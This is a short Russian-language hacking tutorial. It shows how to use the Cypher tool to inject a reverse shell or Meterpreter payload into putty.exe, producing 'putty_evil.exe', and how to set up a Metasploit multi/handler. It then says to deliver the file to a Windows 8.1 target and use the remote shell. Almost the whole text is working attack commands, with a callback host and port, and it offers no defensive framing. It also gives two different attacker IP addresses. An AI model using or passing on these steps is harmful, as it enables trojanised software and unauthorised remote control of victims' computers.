Взлом Windows PC - Cypher
@webware
В качестве атакующей системы будет использоваться OS Kali Linux,

в качестве целевой системы Windows 8.1 с актуальными обновлениями.

Итак, вернемся к Cypher, скачиваем ее с Github:
> git clone https://github.com/xan7r/cypher

Выполняем следующие команды:
> cd cypher
> chmod a+x addShell.py
> ls –a
Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher.

Теперь выполним следующую команду:
> ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0

В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5.
· 0 – windows/shell_reverse_tcp
· 1 – windows/meterpreter/reverse_http
· 2 – windows/meterpreter/reverse_http +PrependMigrate
· 3 – windows/meterpreter/reverse_https
· 4 – windows/meterpreter/reverse_https +PrependMigrate
По итогу получаем файл putty_evil.exe в папке с Cypher.

Теперь настроим на атакующем хосте handler:
> msfconsole
> use multi/handler
> set LPORT 4444
> set LHOST 192.168.0.107
> exploit

Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте.

Сменим кодировку командой:
> chcp 65001

Посмотрим подробную информацию о системе:
> systeminfo

Это все. Спасибо за внимание.